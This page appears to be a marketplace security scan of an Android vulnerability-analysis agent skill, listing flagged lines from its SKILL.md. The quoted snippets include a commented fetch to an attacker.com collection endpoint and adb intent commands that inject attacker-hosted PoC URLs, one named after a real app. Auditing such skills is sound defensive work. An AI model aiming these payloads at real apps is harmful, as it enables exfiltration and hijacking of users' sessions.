Skip to main content

Android Vulnerability Analyzer - Universal Skill

Analyzes Android applications for vulnerabilities using various testing modes and generates documentation for knowledge sharing.

Install this skill

or
73/100

Security score

The Android Vulnerability Analyzer - Universal Skill skill was audited on May 12, 2026 and we found 15 security issues across 4 threat categories. Review the findings below before installing.

Categories Tested

Security Issues

medium line 63

Template literal with variable interpolation in command context

SourceSKILL.md
63```bash
medium line 1185

Curl to non-GitHub URL

SourceSKILL.md
1185curl -s https://api.example.com/user/profile \
low line 1055

Fetch to external URL

SourceSKILL.md
1055// fetch('https://attacker.com/collect', {
medium line 1226

Access to hidden dotfiles in home directory

SourceSKILL.md
1226Use template: `~/.claude/skills/android-vuln-analyzer/templates/report_template.md`
low line 809

External URL reference

SourceSKILL.md
809--es routerUrl "https://yourusername.github.io/poc.html" \
low line 1055

External URL reference

SourceSKILL.md
1055// fetch('https://attacker.com/collect', {
low line 1123

External URL reference

SourceSKILL.md
1123--es <URL_PARAM_NAME> "https://attacker.com/poc.html" \
low line 1130

External URL reference

SourceSKILL.md
1130--es routerUrl "https://attacker.com/poc.html" \
low line 1185

External URL reference

SourceSKILL.md
1185curl -s https://api.example.com/user/profile \
low line 1205

External URL reference

SourceSKILL.md
1205**Calculate:** Use https://www.first.org/cvss/calculator/3.1
low line 1277

External URL reference

SourceSKILL.md
1277if (currentUrl == null || !currentUrl.startsWith("https://example.com")) {
low line 1827

External URL reference

SourceSKILL.md
1827Enter your HTTPS URL: https://yourusername.github.io/phemex-poc.html
low line 1835

External URL reference

SourceSKILL.md
1835--es routerUrl "https://yourusername.github.io/phemex-poc.html"
low line 1854

External URL reference

SourceSKILL.md
1854--es routerUrl "https://yourusername.github.io/phemex-poc.html" \
low line 1982

External URL reference

SourceSKILL.md
1982✓ PoC hosted: https://yourusername.github.io/phemex-poc.html
Scanned on May 12, 2026
View Security Dashboard
Installation guide →